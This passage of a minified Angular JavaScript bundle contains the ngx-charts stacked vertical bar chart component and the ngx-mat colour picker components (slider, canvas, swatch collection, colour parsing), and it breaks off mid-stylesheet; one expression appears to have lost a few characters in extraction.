Tt,this.margin=[10,20,10,20],this.xAxisHeight=0,this.yAxisWidth=0,this.dataLabelMaxHeight={negative:0,positive:0},this.isSSR=!1,this.barChartType=Pm,this.trackBy=(e,i)=>i.name}ngOnInit(){Zv(this.platformId)&&(this.isSSR=!0)}update(){super.update(),this.showDataLabel||(this.dataLabelMaxHeight={negative:0,positive:0}),this.margin=[10+this.dataLabelMaxHeight.positive,20,10+this.dataLabelMaxHeight.negative,20],this.dims=function A6e({width:t,height:a,margins:e,showXAxis:i=!1,showYAxis:n=!1,xAxisHeight:r=0,yAxisWidth:c=0,showXLabel:d=!1,showYLabel:T=!1,showLegend:k=!1,legendType:q=Wa.Ordinal,legendPosition:Y=Su.Right,columns:te=12}){let pe=e[3],Re=t,Fe=a-e[0]-e[2];return k&&Y===Su.Right&&(te-=q===Wa.Ordinal?2:1),Re=Re*te/12,Re=Re-e[1]-e[3],i&&(Fe-=5,Fe-=r,d&&(Fe-=30)),n&&(Re-=5,Re-=c,pe+=c,pe+=10,T&&(Re-=30,pe+=30)),Re=Math.max(0,Re),Fe=Math.max(0,Fe),{width:Math.floor(Re),height:Math.floor(Fe),xOffset:Math.floor(pe)}}({width:this.width,height:this.height,margins:this.margin,showXAxis:this.xAxis,showYAxis:this.yAxis,xAxisHeight:this.xAxisHeight,yAxisWidth:this.yAxisWidth,showXLabel:this.showXAxisLabel,showYLabel:this.showYAxisLabel,showLegend:this.legend,legendType:this.schemeType,legendPosition:this.legendPosition}),this.showDataLabel&&(this.dims.height-=this.dataLabelMaxHeight.negative),this.formatDates(),this.groupDomain=this.getGroupDomain(),this.innerDomain=this.getInnerDomain(),this.valueDomain=this.getValueDomain(),this.xScale=this.getXScale(),this.yScale=this.getYScale(),this.setColors(),this.legendOptions=this.getLegendOptions(),this.transform=`translate(${this.dims.xOffset} , ${this.margin[0]+this.dataLabelMaxHeight.negative})`}getGroupDomain(){const e=[];for(const i of this.results)e.includes(i.label)||e.push(i.label);return e}getInnerDomain(){const e=[];for(const i of this.results)for(const n of i.series)e.includes(n.label)||e.push(n.label);return e}getValueDomain(){const e=[];let i=0,n=0;for(const d of this.results){let T=0,k=0;for(const q of d.series)q.value<0?T+=q.value:k+=q.value,i=q.valuen?q.value:n;e.push(T),e.push(k)}return e.push(i),e.push(n),[Math.min(0,...e),this.yScaleMax?Math.max(this.yScaleMax,...e):Math.max(...e)]}getXScale(){const e=this.groupDomain.length/(this.dims.width/this.barPadding+1);return sT().rangeRound([0,this.dims.width]).paddingInner(e).domain(this.groupDomain)}getYScale(){const e=l2().range([this.dims.height,0]).domain(this.valueDomain);return this.roundDomains?e.nice():e}onDataLabelMaxHeightChanged(e,i){e.size.negative?this.dataLabelMaxHeight.negative=Math.max(this.dataLabelMaxHeight.negative,e.size.height):this.dataLabelMaxHeight.positive=Math.max(this.dataLabelMaxHeight.positive,e.size.height),i===this.results.length-1&&setTimeout(()=>this.update())}groupTransform(e){return`translate(${this.xScale(e.name)||0}, 0)`}onClick(e,i){i&&(e.series=i.name),this.select.emit(e)}setColors(){let e;e=this.schemeType===Wa.Ordinal?this.innerDomain:this.valueDomain,this.colors=new T6e(this.scheme,this.schemeType,e,this.customColors)}getLegendOptions(){const e={scaleType:this.schemeType,colors:void 0,domain:[],title:void 0,position:this.legendPosition};return e.scaleType===Wa.Ordinal?(e.domain=this.innerDomain,e.colors=this.colors,e.title=this.legendTitle):(e.domain=this.valueDomain,e.colors=this.colors.scale),e}updateYAxisWidth({width:e}){this.yAxisWidth=e,this.update()}updateXAxisHeight({height:e}){this.xAxisHeight=e,this.update()}onActivate(e,i,n=!1){const r=Object.assign({},e);i&&(r.series=i.name);const c=this.results.map(d=>d.series).flat().filter(d=>n?d.label===r.name:d.name===r.name&&d.series===r.series);this.activeEntries=[...c],this.activate.emit({value:r,entries:this.activeEntries})}onDeactivate(e,i,n=!1){const r=Object.assign({},e);i&&(r.series=i.name),this.activeEntries=this.activeEntries.filter(c=>n?c.label!==r.name:!(c.name===r.name&&c.series===r.series)),this.deactivate.emit({value:r,entries:this.activeEntries})}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["ngx-charts-bar-vertical-stacked"]],contentQueries:function(e,i,n){if(1&e&&fa(n,sDe,5),2&e){let r;Vt(r=Bt())&&(i.tooltipTemplate=r.first)}},inputs:{legend:"legend",legendTitle:"legendTitle",legendPosition:"legendPosition",xAxis:"xAxis",yAxis:"yAxis",showXAxisLabel:"showXAxisLabel",showYAxisLabel:"showYAxisLabel",xAxisLabel:"xAxisLabel",yAxisLabel:"yAxisLabel",tooltipDisabled:"tooltipDisabled",gradient:"gradient",showGridLines:"showGridLines",activeEntries:"activeEntries",schemeType:"schemeType",trimXAxisTicks:"trimXAxisTicks",trimYAxisTicks:"trimYAxisTicks",rotateXAxisTicks:"rotateXAxisTicks",maxXAxisTickLength:"maxXAxisTickLength",maxYAxisTickLength:"maxYAxisTickLength",xAxisTickFormatting:"xAxisTickFormatting",yAxisTickFormatting:"yAxisTickFormatting",xAxisTicks:"xAxisTicks",yAxisTicks:"yAxisTicks",barPadding:"barPadding",roundDomains:"roundDomains",yScaleMax:"yScaleMax",showDataLabel:"showDataLabel",dataLabelFormatting:"dataLabelFormatting",noBarWhenZero:"noBarWhenZero"},outputs:{activate:"activate",deactivate:"deactivate"},features:[ci],decls:6,vars:13,consts:[[3,"view","showLegend","legendOptions","activeEntries","animations","legendLabelActivate","legendLabelDeactivate","legendLabelClick"],[1,"bar-chart","chart"],["ngx-charts-x-axis","",3,"xScale","dims","showLabel","labelText","trimTicks","rotateTicks","maxTickLength","tickFormatting","ticks","xAxisOffset","dimensionsChanged",4,"ngIf"],["ngx-charts-y-axis","",3,"yScale","dims","showGridLines","showLabel","labelText","trimTicks","maxTickLength","tickFormatting","ticks","dimensionsChanged",4,"ngIf"],[4,"ngIf"],["ngx-charts-x-axis","",3,"xScale","dims","showLabel","labelText","trimTicks","rotateTicks","maxTickLength","tickFormatting","ticks","xAxisOffset","dimensionsChanged"],["ngx-charts-y-axis","",3,"yScale","dims","showGridLines","showLabel","labelText","trimTicks","maxTickLength","tickFormatting","ticks","dimensionsChanged"],[4,"ngFor","ngForOf","ngForTrackBy"],["ngx-charts-series-vertical","",3,"type","xScale","yScale","activeEntries","colors","series","dims","gradient","tooltipDisabled","tooltipTemplate","showDataLabel","dataLabelFormatting","seriesName","animations","noBarWhenZero","select","activate","deactivate","dataLabelHeightChanged"]],template:function(e,i){1&e&&(m(0,"ngx-charts-chart",0),he("legendLabelActivate",function(r){return i.onActivate(r,void 0,!0)})("legendLabelDeactivate",function(r){return i.onDeactivate(r,void 0,!0)})("legendLabelClick",function(r){return i.onClick(r)}),fi(),m(1,"g",1),ne(2,LDe,1,10,"g",2),ne(3,zDe,1,9,"g",3),ne(4,FDe,2,2,"g",4),u(),ne(5,BDe,2,2,"g",4),u()),2&e&&(F("view",Ah(10,Hb,i.width,i.height))("showLegend",i.legend)("legendOptions",i.legendOptions)("activeEntries",i.activeEntries)("animations",i.animations),g(1),Rt("transform",i.transform),g(1),F("ngIf",i.xAxis),g(1),F("ngIf",i.yAxis),g(1),F("ngIf",!i.isSSR),g(1),F("ngIf",i.isSSR))},dependencies:[mq,p6e,_6e,I6e,Ri,Zi],styles:[".ngx-charts-outer{-webkit-animation:chartFadeIn linear .6s;animation:chartFadeIn linear .6s}@-webkit-keyframes chartFadeIn{0%{opacity:0}20%{opacity:0}to{opacity:1}}@keyframes chartFadeIn{0%{opacity:0}20%{opacity:0}to{opacity:1}}.ngx-charts{float:left;overflow:visible}.ngx-charts .circle,.ngx-charts .cell,.ngx-charts .bar,.ngx-charts .arc{cursor:pointer}.ngx-charts .bar.active,.ngx-charts .bar:hover,.ngx-charts .cell.active,.ngx-charts .cell:hover,.ngx-charts .arc.active,.ngx-charts .arc:hover,.ngx-charts .card.active,.ngx-charts .card:hover{opacity:.8;transition:opacity .1s ease-in-out}.ngx-charts .bar:focus,.ngx-charts .cell:focus,.ngx-charts .arc:focus,.ngx-charts .card:focus{outline:none}.ngx-charts .bar.hidden,.ngx-charts .cell.hidden,.ngx-charts .arc.hidden,.ngx-charts .card.hidden{display:none}.ngx-charts g:focus{outline:none}.ngx-charts .line-series.inactive,.ngx-charts .line-series-range.inactive,.ngx-charts .polar-series-path.inactive,.ngx-charts .polar-series-area.inactive,.ngx-charts .area-series.inactive{transition:opacity .1s ease-in-out;opacity:.2}.ngx-charts .line-highlight{display:none}.ngx-charts .line-highlight.active{display:block}.ngx-charts .area{opacity:.6}.ngx-charts .circle:hover{cursor:pointer}.ngx-charts .label{font-size:12px;font-weight:400}.ngx-charts .tooltip-anchor{fill:#000}.ngx-charts .gridline-path{stroke:#ddd;stroke-width:1;fill:none}.ngx-charts .refline-path{stroke:#a8b2c7;stroke-width:1;stroke-dasharray:5;stroke-dashoffset:5}.ngx-charts .refline-label{font-size:9px}.ngx-charts .reference-area{fill-opacity:.05;fill:#000}.ngx-charts .gridline-path-dotted{stroke:#ddd;stroke-width:1;fill:none;stroke-dasharray:1,20;stroke-dashoffset:3}.ngx-charts .grid-panel rect{fill:none}.ngx-charts .grid-panel.odd rect{fill:#0000000d}\n"],encapsulation:2,data:{animation:[nr("animationState",[gn(":leave",[zi({opacity:1,transform:"*"}),En(500,zi({opacity:0,transform:"scale(0)"}))])])]},changeDetection:0}),t})(),xq=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),S6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),k6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),P6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),wq=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})();Math;let YI=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),L6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd,YI,wq]]}),t})(),W6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),F6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd]]}),t})(),V6e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[[Vd,YI,xq]]}),t})(),Iq=(()=>{class t{constructor(){!function B6e(){"undefined"!=typeof SVGElement&&void 0===SVGElement.prototype.contains&&(SVGElement.prototype.contains=HTMLDivElement.prototype.contains)}()}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Vd,D6e,xq,S6e,k6e,P6e,wq,L6e,W6e,YI,F6e,V6e]}),t})();const Rq=function(t){return{active:t}};function H6e(t,a){if(1&t){const e=Ye();m(0,"button",2),he("click",function(){const r=be(e).$implicit;return Me(V().select(r))}),u()}if(2&t){const e=a.$implicit,i=V();ri("background-color",e),F("ngClass",fr(3,Rq,i.selectedColor===e))}}function U6e(t,a){if(1&t){const e=Ye();m(0,"button",2),he("click",function(){const r=be(e).$implicit;return Me(V().select(r))}),u()}if(2&t){const e=a.$implicit,i=V();ri("background-color",e),F("ngClass",fr(3,Rq,i.selectedColor===e))}}const q6e=/^\s+/,G6e=/\s+$/,u2=Math.round,j6e=(Math,Math,Math,/[^0-9]/g),Sq=["#ffffff","#ffff00","#ff00ff","#ff0000","#c0c0c0","#808080","#808000","#800080","#800000","#00ffff","#00ff00","#008080","#008000","#0000ff","#000080","#000000"];function kq(t,a,e){const i=t.getImageData(a,e,1,1).data;return{r:i[0],g:i[1],b:i[2]}}function Ng(t){return 1==t.length?"0"+t:""+t}function $6e(t){return Math.round(255*parseFloat(t)).toString(16)}function Pq(t){return Xl(t)/255}function Xl(t){return parseInt(t,16)}function Oq(t,a,e,i){var n=[Ng(u2(t).toString(16)),Ng(u2(a).toString(16)),Ng(u2(e).toString(16))];return i&&n[0].charAt(0)==n[0].charAt(1)&&n[1].charAt(0)==n[1].charAt(1)&&n[2].charAt(0)==n[2].charAt(1)?n[0].charAt(0)+n[1].charAt(0)+n[2].charAt(0):n.join("")}const Sp="(?:[-\\+]?\\d*\\.\\d+%?)|(?:[-\\+]?\\d+%?)",JI="[\\s|\\(]+("+Sp+")[,|\\s]+("+Sp+")[,|\\s]+("+Sp+")\\s*\\)?",ZI="[\\s|\\(]+("+Sp+")[,|\\s]+("+Sp+")[,|\\s]+("+Sp+")[,|\\s]+("+Sp+")\\s*\\)?",Lg={CSS_UNIT:new RegExp(Sp),rgb:new RegExp("rgb"+JI),rgba:new RegExp("rgba"+ZI),hsl:new RegExp("hsl"+JI),hsla:new RegExp("hsla"+ZI),hsv:new RegExp("hsv"+JI),hsva:new RegExp("hsva"+ZI),hex3:/^#?([0-9a-fA-F]{1})([0-9a-fA-F]{1})([0-9a-fA-F]{1})$/,hex6:/^#?([0-9a-fA-F]{2})([0-9a-fA-F]{2})([0-9a-fA-F]{2})$/,hex4:/^#?([0-9a-fA-F]{1})([0-9a-fA-F]{1})([0-9a-fA-F]{1})([0-9a-fA-F]{1})$/,hex8:/^#?([0-9a-fA-F]{2})([0-9a-fA-F]{2})([0-9a-fA-F]{2})([0-9a-fA-F]{2})$/};function e5(t){let a;return t=t.replace(q6e,"").replace(G6e,"").toLowerCase(),(a=Lg.rgb.exec(t))?{r:a[1],g:a[2],b:a[3],a:1}:(a=Lg.rgba.exec(t))?{r:a[1],g:a[2],b:a[3],a:a[4]}:(a=Lg.hex8.exec(t))?{r:Xl(a[1]),g:Xl(a[2]),b:Xl(a[3]),a:Pq(a[4])}:(a=Lg.hex6.exec(t))?{r:Xl(a[1]),g:Xl(a[2]),b:Xl(a[3]),a:1}:(a=Lg.hex4.exec(t))?{r:Xl(a[1]+""+a[1]),g:Xl(a[2]+""+a[2]),b:Xl(a[3]+""+a[3]),a:Pq(a[4]+""+a[4])}:(a=Lg.hex3.exec(t))?{r:Xl(a[1]+""+a[1]),g:Xl(a[2]+""+a[2]),b:Xl(a[3]+""+a[3]),a:1}:null}class kp{constructor(a,e,i,n){this.r=a>255?255:a,this.g=e>255?255:e,this.b=i>255?255:i,this.a=null!=n?n>1?1:n:1,this.roundA=Math.round(this.a),this.hex=Oq(this.r,this.g,this.b),this.rgba=this.toRgba()}toHex(a){return Oq(this.r,this.g,this.b,a)}toRgba(){return`rgba(${this.r},${this.g},${this.b},${this.a})`}toHexString(a){return"#"+this.toHex(a)}toRgbString(){return 1===this.a?"rgb("+Math.round(this.r)+", "+Math.round(this.g)+", "+Math.round(this.b)+")":"rgba("+Math.round(this.r)+", "+Math.round(this.g)+", "+Math.round(this.b)+", "+this.roundA+")"}toHex8(a){return function Q6e(t,a,e,i,n){var r=[Ng(u2(t).toString(16)),Ng(u2(a).toString(16)),Ng(u2(e).toString(16)),Ng($6e(i))];return n&&r[0].charAt(0)==r[0].charAt(1)&&r[1].charAt(0)==r[1].charAt(1)&&r[2].charAt(0)==r[2].charAt(1)&&r[3].charAt(0)==r[3].charAt(1)?r[0].charAt(0)+r[1].charAt(0)+r[2].charAt(0)+r[3].charAt(0):r.join("")}(this.r,this.g,this.b,this.a,a)}toHex8String(a){return"#"+this.toHex8(a)}toString(a){let i;return a||!(this.a<1&&this.a>=0)||"hex"!==a&&"hex6"!==a&&"hex3"!==a&&"hex4"!==a&&"hex8"!==a?("rgb"===a&&(i=this.toRgbString()),("hex"===a||"hex6"===a)&&(i=this.toHexString()),"hex3"===a&&(i=this.toHexString(!0)),"hex4"===a&&(i=this.toHex8String(!0)),"hex8"===a&&(i=this.toHex8String()),i||this.toHexString()):this.toRgbString()}}let Nq=(()=>{class t{constructor(e,i){this.zone=e,this.colorChanged=new Tt,this.x=0,this.y=0,this.drag=!1,this._destroyed=new J,this.elementId=i}ngOnDestroy(){this._destroyed.next(),this._destroyed.complete()}ngAfterViewInit(){this.canvas=document.getElementById(this.elementId),this.ctx=this.canvas.getContext("2d"),this.width=this.canvas.width,this.height=this.canvas.height,this.draw()}draw(){this.ctx.clearRect(0,0,this.width,this.height),this.ctx.rect(0,0,this.width,this.height),this.fillGradient(),0!=this.y&&this.redrawIndicator(this.x,this.y)}onMousedown(e){this.drag=!0,this.changeColor(e),this.zone.runOutsideAngular(()=>{this.canvas.addEventListener("mousemove",this.onMousemove.bind(this))})}onMousemove(e){this.drag&&this.zone.run(()=>{this.changeColor(e)})}onMouseup(e){this.drag=!1,this.canvas.removeEventListener("mousemove",this.onMousemove)}emitChange(e){this.colorChanged.emit(e)}}return t.\u0275fac=function(e){_d()},t.\u0275dir=Ot({type:t,inputs:{color:"color"},outputs:{colorChanged:"colorChanged"}}),t})(),Y6e=(()=>{class t extends Nq{constructor(e){super(e,"color-strip"),this.zone=e}ngOnInit(){}ngAfterViewInit(){super.ngAfterViewInit()}fillGradient(){const e=this.ctx.createLinearGradient(0,0,0,this.height);e.addColorStop(0,"rgba(255, 0, 0, 1)"),e.addColorStop(.17,"rgba(255, 255, 0, 1)"),e.addColorStop(.34,"rgba(0, 255, 0, 1)"),e.addColorStop(.51,"rgba(0, 255, 255, 1)"),e.addColorStop(.68,"rgba(0, 0, 255, 1)"),e.addColorStop(.85,"rgba(255, 0, 255, 1)"),e.addColorStop(1,"rgba(255, 0, 0, 1)"),this.ctx.fillStyle=e,this.ctx.fill()}redrawIndicator(e,i){this.ctx.beginPath(),this.ctx.strokeStyle="white",this.ctx.lineWidth=2,this.ctx.arc(7.5,i,7.5,0,2*Math.PI,!1),this.ctx.stroke(),this.ctx.closePath()}changeColor(e){this.x=e.offsetX,this.y=e.offsetY,this.draw();const{r:i,g:n,b:r}=kq(this.ctx,e.offsetX,e.offsetY);this.emitChange(new kp(i,n,r))}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-slider"]],features:[ci],decls:1,vars:0,consts:[["id","color-strip","width","15","height","200",1,"zone-strip",3,"mousedown","mouseup"]],template:function(e,i){1&e&&(m(0,"canvas",0),he("mousedown",function(r){return i.onMousedown(r)})("mouseup",function(r){return i.onMouseup(r)}),u())}}),t})(),J6e=(()=>{class t{constructor(){}onInput(e){this._formatInput(e.target)}_formatInput(e){let i=Number(e.value.replace(j6e,""));i=isNaN(i)?0:i,e.value=i}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["","ngxMatNumericColorInput",""]],hostBindings:function(e,i){1&e&&he("input",function(r){return i.onInput(r)})}}),t})(),exe=(()=>{class t extends Nq{constructor(e){super(e,"color-block"),this.zone=e,this._resetBaseColor=!0,this.formGroup=new R4({r:new lu(null,[Td.required]),g:new lu(null,[Td.required]),b:new lu(null,[Td.required]),a:new lu(null,[Td.required]),hex:new lu(null,[Td.required,Td.pattern(Lg.hex6)])})}get rCtrl(){return this.formGroup.get("r")}get gCtrl(){return this.formGroup.get("g")}get bCtrl(){return this.formGroup.get("b")}get aCtrl(){return this.formGroup.get("a")}get hexCtrl(){return this.formGroup.get("hex")}ngOnInit(){ra(this.rCtrl.valueChanges,this.gCtrl.valueChanges,this.bCtrl.valueChanges,this.aCtrl.valueChanges).pipe(ea(this._destroyed),lp(400)).subscribe(n=>{const r=new kp(Number(this.rCtrl.value),Number(this.gCtrl.value),Number(this.bCtrl.value),Number(this.aCtrl.value));this.emitChange(r)}),this.hexCtrl.valueChanges.pipe(ea(this._destroyed),lp(400),Bh()).subscribe(n=>{const r=e5(n);if(null!=r){const c=new kp(r.r,r.g,r.b,r.a);this.emitChange(c)}})}ngOnChanges(e){e.color&&e.color.currentValue&&(this.updateForm(e.color.currentValue),this._resetBaseColor&&(this._baseColor=e.color.currentValue),this._resetBaseColor=!0,e.color.firstChange||this.draw())}updateForm(e){const i={emitEvent:!1};this.rCtrl.setValue(e.r,i),this.gCtrl.setValue(e.g,i),this.bCtrl.setValue(e.b,i),this.aCtrl.setValue(e.a,i),this.hexCtrl.setValue(e.hex,i)}redrawIndicator(e,i){this.ctx.beginPath(),this.ctx.strokeStyle="white",this.ctx.arc(e,i,5,0,2*Math.PI,!1),this.ctx.stroke(),this.ctx.closePath()}fillGradient(){this.ctx.fillStyle=this._baseColor?this._baseColor.rgba:"rgba(255,255,255,1)",this.ctx.fillRect(0,0,this.width,this.height);const e=this.ctx.createLinearGradient(0,0,this.width,0);e.addColorStop(0,"rgba(255,255,255,1)"),e.addColorStop(1,"rgba(255,255,255,0)"),this.ctx.fillStyle=e,this.ctx.fillRect(0,0,this.width,this.height);const i=this.ctx.createLinearGradient(0,0,0,this.height);i.addColorStop(0,"rgba(0,0,0,0)"),i.addColorStop(1,"rgba(0,0,0,1)"),this.ctx.fillStyle=i,this.ctx.fillRect(0,0,this.width,this.height)}onSliderColorChanged(e){this._baseColor=e,this.color=e,this.fillGradient(),this.emitChange(e)}changeColor(e){this.x=e.offsetX,this.y=e.offsetY,this._resetBaseColor=!1,this.draw();const{r:i,g:n,b:r}=kq(this.ctx,e.offsetX,e.offsetY);this.emitChange(new kp(i,n,r))}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-canvas"]],hostAttrs:[1,"ngx-mat-color-canvas"],features:[ci,sa],decls:30,vars:3,consts:[[3,"formGroup"],[1,"color-canvas-row"],[1,"zone-canvas"],["id","color-block","width","200","height","200",1,"zone-block",3,"mousedown","mouseup"],[3,"colorChanged"],[1,"zone-inputs"],["matInput","","formControlName","r","ngxMatNumericColorInput","","autocomplete","off"],["matInput","","formControlName","g","ngxMatNumericColorInput","","autocomplete","off"],["matInput","","formControlName","b","ngxMatNumericColorInput","","autocomplete","off"],["mat-mini-fab","",1,"preview"],["matPrefix","",1,"symbol"],["matInput","","formControlName","hex","autocomplete","off"],["matInput","","formControlName","a","type","number","min","0","max","1","step","0.1","autocomplete","off"]],template:function(e,i){1&e&&(m(0,"form",0)(1,"div",1)(2,"div",2)(3,"canvas",3),he("mousedown",function(r){return i.onMousedown(r)})("mouseup",function(r){return i.onMouseup(r)}),u(),m(4,"ngx-mat-color-slider",4),he("colorChanged",function(r){return i.onSliderColorChanged(r)}),u()(),m(5,"div",5)(6,"mat-form-field")(7,"mat-label"),s(8,"R"),u(),it(9,"input",6),u(),m(10,"mat-form-field")(11,"mat-label"),s(12,"G"),u(),it(13,"input",7),u(),m(14,"mat-form-field")(15,"mat-label"),s(16,"B"),u(),it(17,"input",8),u()()(),m(18,"div",1),it(19,"button",9),m(20,"mat-form-field")(21,"mat-label"),s(22,"HEX6"),u(),m(23,"mat-label",10),s(24,"#\xa0"),u(),it(25,"input",11),u(),m(26,"mat-form-field")(27,"mat-label"),s(28,"A"),u(),it(29,"input",12),u()()()),2&e&&(F("formGroup",i.formGroup),g(19),ri("background-color",(null==i.color?null:i.color.rgba)||"transparent"))},dependencies:[nn,un,mF,Xa,da,EN,an,Ac,Ta,lN,Dd,mx,lg,lx,Y6e,J6e],styles:[".ngx-mat-color-canvas .color-canvas-row{display:flex}.ngx-mat-color-canvas .color-canvas-row:first-of-type{height:200px;margin-bottom:12px}.ngx-mat-color-canvas .color-canvas-row:first-of-type .card{height:180px}.ngx-mat-color-canvas .color-canvas-row canvas:hover{cursor:crosshair}.ngx-mat-color-canvas .color-canvas-row .zone{display:flex}.ngx-mat-color-canvas .color-canvas-row .zone-canvas{height:200px}.ngx-mat-color-canvas .color-canvas-row .zone-canvas .zone-block{border:1px solid rgba(0,0,0,.12)}.ngx-mat-color-canvas .color-canvas-row .zone-strip{flex-basis:auto;margin-left:10px}.ngx-mat-color-canvas .color-canvas-row .zone-inputs{display:flex;width:40px;height:200px;flex-direction:column;margin-left:16px;margin-top:12px}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2){display:flex}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2) .preview{min-width:40px;min-height:40px;height:40px;width:40px}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2) .mat-form-field{margin-left:16px}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2) .mat-form-field:first-of-type{width:170px}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2) .mat-form-field:first-of-type .symbol{font-weight:bold;color:#0000008a}.ngx-mat-color-canvas .color-canvas-row:nth-of-type(2) .mat-form-field:last-of-type{width:40px}.ngx-mat-color-canvas .mat-form-field-label{font-weight:bold}\n"],encapsulation:2}),t})(),txe=(()=>{class t{constructor(){this.colorChanged=new Tt,this.colors1=Sq.slice(0,8),this.colors2=Sq.slice(8,16)}set color(e){e&&(this.selectedColor=e.toHexString())}ngOnInit(){}select(e){this.selectedColor=e;const{r:i,g:n,b:r,a:c}=e5(e);this.colorChanged.emit(new kp(i,n,r,c))}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-collection"]],hostAttrs:[1,"ngx-mat-color-collection"],inputs:{color:"color"},outputs:{colorChanged:"colorChanged"},decls:4,vars:2,consts:[[1,"color-collection-row"],["mat-mini-fab","","class","btn-color",3,"background-color","ngClass","click",4,"ngFor","ngForOf"],["mat-mini-fab","",1,"btn-color",3,"ngClass","click"]],template:function(e,i){1&e&&(m(0,"div",0),ne(1,H6e,1,5,"button",1),u(),m(2,"div",0),ne(3,U6e,1,5,"button",1),u()),2&e&&(g(1),F("ngForOf",i.colors1),g(2),F("ngForOf",i.colors2))},dependencies:[ig,Zi,da],styles:[".ngx-mat-color-collection .btn-color{height:20px;width:20px;margin-right:11px;box-shadow:none;opacity:.3}.ngx-mat-color-collection .btn-color.active{box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f;opacity:1}\n"],encapsulation:2}),t})(),Lq=(()=>{class t{constructor(){this.colorChanged=new Tt}ngOnInit(){}handleColorChanged(e){this.colorChanged.emit(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-palette"]],hostAttrs:[1,"ngx-mat-color-palette"],inputs:{color:"color"},outputs:{colorChanged:"colorChanged"},decls:2,vars:2,consts:[[3,"color","colorChanged"]],template:function(e,i){1&e&&(m(0,"ngx-mat-color-canvas",0),he("colorChanged",function(r){return i.handleColorChanged(r)}),u(),m(1,"ngx-mat-color-collection",0),he("colorChanged",function(r){return i.handleColorChanged(r)}),u()),2&e&&(F("color",i.color),g(1),F("color",i.color))},dependencies:[exe,txe],styles:[".ngx-mat-color-palette .actions{margin-top:10px;display:flex}.ngx-mat-color-palette .actions .left{display:flex;flex-direction:column;margin-right:15px}.ngx-mat-color-palette .actions .left .preview{flex:2 1 auto;margin-bottom:10px}.ngx-mat-color-palette .actions .right{display:flex;width:40px;flex-direction:column}\n"],encapsulation:2}),t})(),t5=(()=>{class t{constructor(){}sameColor(e,i){return null==e&&null==i||null!=e&&null!=i&&e.rgba===i.rgba}format(e,i){return e.toString(i)}parse(e){const i=e5(e);return i?new kp(i.r,i.g,i.b,i.a):null}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();const ixe={display:{colorInput:"hex"}},zq=new ni("mat-color-formats"),Wq=new ni("ngx-mat-colorpicker-scroll-strategy"),nxe={provide:Wq,deps:[As],useFactory:function axe(t){return()=>t.scrollStrategies.reposition()}},oxe=Pd(class{constructor(t){this._elementRef=t}});let Fq=(()=>{class t extends oxe{constructor(e){super(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-mat-color-picker-content"]],viewQuery:function(e,i){if(1&e&&Mi(Lq,5),2&e){let n;Vt(n=Bt())&&(i._palette=n.first)}},hostAttrs:[1,"ngx-mat-colorpicker-content"],hostVars:3,hostBindings:function(e,i){2&e&&(s1("@transformPanel","enter"),Ct("ngx-mat-colorpicker-content-touch",i.picker.touchUi))},inputs:{color:"color"},exportAs:["ngxMatColorPickerContent"],features:[ci],decls:1,vars:1,consts:[[3,"color","colorChanged"]],template:function(e,i){1&e&&(m(0,"ngx-mat-color-palette",0),he("colorChanged",function(r){return i.picker.select(r)}),u()),2&e&&F("color",i.picker._selected)},dependencies:[Lq],styles:[".ngx-mat-colorpicker-content{display:block;border-radius:4px;box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f;background-color:#fff;color:#000000de;padding:16px}.ngx-mat-colorpicker-content .ngx-mat-color-palette{width:296px;height:354px}.ngx-mat-colorpicker-content-touch{display:block;max-height:80vh;overflow:auto}.ngx-mat-colorpicker-content-touch .ngx-mat-color-palette{min-width:250px;min-height:312px;max-width:750px;max-height:788px}@media all and (orientation: landscape){.mat-colorpicker-content-touch .ngx-mat-color-palette{width:64vh;height:80vh}}@media all and (orientation: portrait){.mat-colorpicker-content-touch 